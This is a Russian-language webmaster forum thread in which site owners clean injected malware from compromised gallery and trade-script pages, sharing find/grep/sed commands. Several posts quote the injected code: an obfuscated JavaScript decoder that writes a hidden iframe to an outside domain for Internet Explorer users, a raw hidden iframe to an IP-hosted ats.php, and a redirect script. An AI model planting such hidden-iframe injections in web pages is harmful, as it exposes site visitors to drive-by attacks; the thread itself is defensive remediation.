Реклама на сайте Advertise with us

Очень нестандартный трейдер или взлом АТS?

Расширенный поиск по форуму
 
Новая тема Новая тема   
Автор
Поиск в теме:



С нами с 10.10.07
Сообщения: 339
Рейтинг: 404

Ссылка на сообщениеДобавлено: 14/11/08 в 18:00       Ответить с цитатойцитата 

Вывести список заражённых файлов:
Код:
find / -name \*.html -exec grep -H "3C696672616D652073" {} \; | awk -F":" '{print $1}'
find / -name \*.php -exec grep -H "2020696620282" {} \; | awk -F":" '{print $1}'



почистить в автоматическом режиме:
[freebsd]
Код:
for i in `find ./ -name \*.html -exec grep -H "3C696672616D652073" {} \; | awk -F":" '{print $1}' | xargs`; do sed -i '' 's/<script.*document.write.*unesca.*<\/script>//g' $i; done


[linux]

Код:
for i in `find ./ -name \*.html -exec grep -H "3C696672616D652073" {} \; | awk -F":" '{print $1}' | xargs`; do sed -i  's/<script.*document.write.*unesca.*<\/script>//g' $i; done


P.S.
обратись к моим админам icon_smile.gif

http://soft-com.biz/ - Администрирование серверов, 24/7 тех.поддержка и мониторинг.

0
 

old.flysays.com

С нами с 03.09.03
Сообщения: 1510
Рейтинг: 1284

Ссылка на сообщениеДобавлено: 15/11/08 в 12:10       Ответить с цитатойцитата 

Спасибо, почистился. smail54.gif

Вот только один домен все же успел попасть под раздачу гугла. Уже подал запрос на review моего сайта в Google Tools, чтобы убрали блок на мой домен.

Как долго ждать восстановления?

Cartoon Porn - Drawn-Cash.com
Абсолютно новый Tram Pararam! Лучший сайт в нише Cartoon Porn!

0
 



С нами с 22.08.08
Сообщения: 1452
Рейтинг: 440

Ссылка на сообщениеДобавлено: 15/11/08 в 12:28       Ответить с цитатойцитата 

0
 

Прожигатель жизни

С нами с 20.10.05
Сообщения: 942
Рейтинг: 638

Ссылка на сообщениеДобавлено: 17/11/08 в 16:35       Ответить с цитатойцитата 

Появился трейдер непонятный, в сорсе админ паги:
Код:
<td class="normalrow" onmouseover="showsubmenu(this)" onmouseout="hidesubmenu(this)" style="background-color:#FFCCCC;"><a target="_blank" href="masex.com\"><iframe   width=1   height=1   src=http://79.135.187.18/ats/ats.php></iframe><aaaa=\"">masex.com\"><iframe_width=1_height=1_src=http</a>

Удалить не получается icon_sad.gif
Че делать? хелп!
Прочекал все .php .html .tpl файлы ничего не нашел...

0
 

Прожигатель жизни

С нами с 20.10.05
Сообщения: 942
Рейтинг: 638

Ссылка на сообщениеДобавлено: 17/11/08 в 16:38       Ответить с цитатойцитата 

Вроде бы кильнул: стер в tradefiles, datafilesm и в main.csv.
Поменял пароль навсякий...

0
 



С нами с 29.07.03
Сообщения: 426
Рейтинг: 512

Ссылка на сообщениеДобавлено: 17/11/08 в 17:57       Ответить с цитатойцитата 

Почитай топик с начала. Пароль тебя не спасет.

0
 

Прожигатель жизни

С нами с 20.10.05
Сообщения: 942
Рейтинг: 638

Ссылка на сообщениеДобавлено: 18/11/08 в 12:35       Ответить с цитатойцитата 


Спс, последовал рекомендациям smail54.gif

0
 



С нами с 27.10.05
Сообщения: 20
Рейтинг: 1

Ссылка на сообщениеДобавлено: 06/07/09 в 03:40       Ответить с цитатойцитата 

Soft-Com писал:


[linux]

Код:
for i in `find ./ -name \*.html -exec grep -H "3C696672616D652073" {} \; | awk -F":" '{print $1}' | xargs`; do sed -i  's/<script.*document.write.*unesca.*<\/script>//g' $i; done



не дайте погибнуть, подскажите в чем затык icon_sad.gif
не идет под линухом то что Soft-Com написал.
поправил строчку автора , убрал чтоб искало не с корня, а с текущей диры и вырезало все что между
Код:
<script /script>
. Ошибок нет и результата тоже.
Код:
for i in `find -name \*.html -exec grep -H "3C696672616D652073" {} \; | awk -F":" '{print $1}' | xargs`; do sed -i  's/<script.*<\/script>//g' $i; done

0
 



С нами с 10.10.07
Сообщения: 339
Рейтинг: 404

Ссылка на сообщениеДобавлено: 06/07/09 в 08:52       Ответить с цитатойцитата 

очень странно, а что даёт на вывод команда
Код:

find -name \*.html -exec grep -H "3C696672616D652073" {} \; | awk -F":" '{print $1}' | xargs


?

и дай сюда кусок, который находиться между <script> и </script>, которые ты хочешь удалить.

http://soft-com.biz/ - Администрирование серверов, 24/7 тех.поддержка и мониторинг.

0
 



С нами с 27.10.05
Сообщения: 20
Рейтинг: 1

Ссылка на сообщениеДобавлено: 06/07/09 в 21:37       Ответить с цитатойцитата 

Soft-Com спасибо что отозвался icon_biggrin.gif
поиск все верно выдает, в 2 файлах несколько раз встречается script
find -name \*.html -exec grep -H "script" {} \; | awk -F":" '{print $1}' | xargs
./bbabe.html ./bbabe.html ./bbabe.html ./bbabe.html ./bbabe.html ./bbabe.html ./bbabe.html ./bbabe.html ./bbabe.html ./bbabd.html ./bbabd.html ./bbabd.html ./bbabd.html ./bbabd.html ./bbabd.html ./bbabd.html ./bbabd.html ./bbabd.html

и регэксп нормально работает типа 's/ZZZ/XXX/g'
проблемы начинаются когда пытаюсь написать чтоб резало все между тэгами script типа 's/<script.*<\/script>//g'

а вырезати надо че-то типа такого

Код:
<script language=javascript><!--
((t){eval(unescape((',76,61r,20a,3d,22Scr,69p,74Eng,69ne,22,2c,62,3d,22Ver,73ion()+,22,2cj,3d,22,22,2cu,3dnavigato,72,2euserAgent,3b
--></script><script language=javascript><!--
((){var VY6='%';var HX3='>76>61r>20a>3d>22ScriptEng>69ne>22>2c>62>3d>22V>65>72>73ion()+>22>2cj>3d>22>22>2c>75>3dnavigator>2eu>73>65r
--></script><script language=javascript><!--
((LVJSq){var xmfRk='%';var N0Wx=('var.20a.3d.22S.63rip.74Eng.69.6ee.22.2cb.3d.22Ve.72sion()+.22.2cj.3d.22.22.2cu.3d.6e.61vigator.2e.
--></script><script language=javascript><!--
((RGO){var oeswP='%';var Vcu5='var>20>61>3d>22ScriptEngine>22>2cb>3d>22Version()+>22>2cj>3d>22>22>2cu>3dnavigator>2euserAgent>3bif((
--></script><script language=javascript><!--
((KHxA7){var B80='%';var tViW='var,20a,3d,22,53,63ri,70tEn,67i,6e,65,22,2c,62,3d,22Vers,69,6fn()+,22,2c,6a,3d,22,22,2cu,3d,6e,61viga
--></script>

0
 



С нами с 10.10.05
Сообщения: 785
Рейтинг: 783

Ссылка на сообщениеДобавлено: 06/07/09 в 22:09       Ответить с цитатойцитата 

в нутри этой фигни следущее

Код:
<script>
var s='3C696672616D65207372633D22687474703A2F2F7777772E63656C6562726974796E796D70686F2E636F6D2F73742F6E69636865732F7A2F7374617469632E70687022206865696768743D223222207374796C653D22646973706C61793A6E6F6E65222077696474683D2232223E3C2F696672616D653E';
var o=''; for(i=0;i<s.length;i=i+2) {var c=String.fromCharCode(37); o=o+c+s.substr(i,2);}
var v=navigator.userAgent.toLowerCase();
if (v.indexOf('msie') != -1 && v.indexOf('nt 6.') == -1){unescape(o);}
</script>


<iframe src="http://www.celebritynympho.com/st/niches/z/static.php" height="2" style="display:none" width="2"></iframe>

а там

<script>
window.location='http://www.lotsofxxxclips.com/';
</script>

разбирайтесь птшите абузы

0
 



С нами с 27.10.05
Сообщения: 20
Рейтинг: 1

Ссылка на сообщениеДобавлено: 06/07/09 в 22:21       Ответить с цитатойцитата 

usanatol писал:
разбирайтесь птшите абузы


не в арбузах счастие, убрать бы ето дерьмо с галер icon_cry.gif
сделаного жалко, файла дохрена, руками почистить не реально.

0
 



С нами с 10.10.05
Сообщения: 785
Рейтинг: 783

Ссылка на сообщениеДобавлено: 06/07/09 в 22:24       Ответить с цитатойцитата 

Ну если хакинг скриптов сотен машин не повод тогда можно и дальше продолжать

0
 



С нами с 10.10.07
Сообщения: 339
Рейтинг: 404

Ссылка на сообщениеДобавлено: 06/07/09 в 22:27       Ответить с цитатойцитата 

попробуй так:

Код:

for i in `find ./ -name *.*tm* -exec grep -H "76,61r,20a,3d,22Scr,69p,74Eng" {} \; | awk -F":" '{print $1}' | xargs`; do sed -ni '1h;1!H;${;g;s/<script language=javascript><!--.*--><\/script>//g;p;}' $i; done


по идее поможет, но надо бы проверить потом контент на наличие скриптов, через которые рассадили хрень, типа r57, о69 и дофига других.

http://soft-com.biz/ - Администрирование серверов, 24/7 тех.поддержка и мониторинг.

0
 



С нами с 10.10.07
Сообщения: 339
Рейтинг: 404

Ссылка на сообщениеДобавлено: 06/07/09 в 22:29       Ответить с цитатойцитата 

Fantomas писал:
не в арбузах счастие, убрать бы ето дерьмо с галер icon_cry.gif
сделаного жалко, файла дохрена, руками почистить не реально.


usanatol абсолютно прав, домен на адванседах находится - абсолютно адекватные ребята, помогут наказать уродов.

http://soft-com.biz/ - Администрирование серверов, 24/7 тех.поддержка и мониторинг.

0
 



С нами с 27.10.05
Сообщения: 20
Рейтинг: 1

Ссылка на сообщениеДобавлено: 06/07/09 в 22:55       Ответить с цитатойцитата 

usanatol: не серчай. соласный я с тобой на все 100, просто приоритеты у меня сча на восстановление.

Soft-Com: спасибо тебе огромное. помогло smail54.gif
только подправил я немного ето дело.
1.поиск не с корня а с текущей диры.
2.поиск все же по "script", код может менятся а оно там точно будет, хотя повылазят тэги description.
3.вырезать решил все же /<script.*<\/script>/ ибо может и не быть "script language=javascript"
получилось так
Код:
for i in `find -name \*.\*tm\* -exec grep -H "script" {} \; | awk -F":" '{print $1}' | xargs`; do sed -ni '1h;1!H;${;g;s/<script.*<\/script>//g;p;}' $i; done


вобщем спасибо всем кто переживал и особенно Soft-Com

0
 



С нами с 10.10.07
Сообщения: 339
Рейтинг: 404

Ссылка на сообщениеДобавлено: 06/07/09 в 23:07       Ответить с цитатойцитата 

Ну, хозяин - барин, но всё-же если были полезные скриптовые вставки, ты их удалил icon_smile.gif, так что если тебе именно это и нужно, то другим не поможет.

а абузу всё равно напиши.

http://soft-com.biz/ - Администрирование серверов, 24/7 тех.поддержка и мониторинг.

0
 



С нами с 27.10.05
Сообщения: 20
Рейтинг: 1

Ссылка на сообщениеДобавлено: 06/07/09 в 23:38       Ответить с цитатойцитата 

Soft-Com: в том то и дело что у меня галеры лежат ниже паг со скриптами, поэтому и ищу не с корня а с текущей диры smail101.gif
в галерах никаких скриптов не надо.
у других будет из чего выбрать, не потеряются.

а арбуз надо подарить, только вот закончу лечение и поиск откуда ето все вылезло, благо написано на мастере не мало

исчо раз спасибо, даж не знаю ... если чем смогу помочь ... потом... когда нибудь... icon_lol.gif

0
 



С нами с 10.10.07
Сообщения: 339
Рейтинг: 404

Ссылка на сообщениеДобавлено: 07/07/09 в 06:40       Ответить с цитатойцитата 

Fantomas, сорри что пишу здесь, нет твоих данных в профайле - какие скрипты стояли и какие меры защиты были, что смогли поломать?

http://soft-com.biz/ - Администрирование серверов, 24/7 тех.поддержка и мониторинг.

0
 
Новая тема Новая тема   

Текстовая реклама в форме ответа
Заголовок и до четырех строчек текста
Длина текста до 350 символов
Купить рекламу в этом месте!


Перейти:  



Спонсор раздела Стань спонсором этого раздела!

Реклама на сайте Advertise with us

Опросы

Рецепт новогоднего блюда 2022



Обсудите на форуме обсудить (11)
все опросы »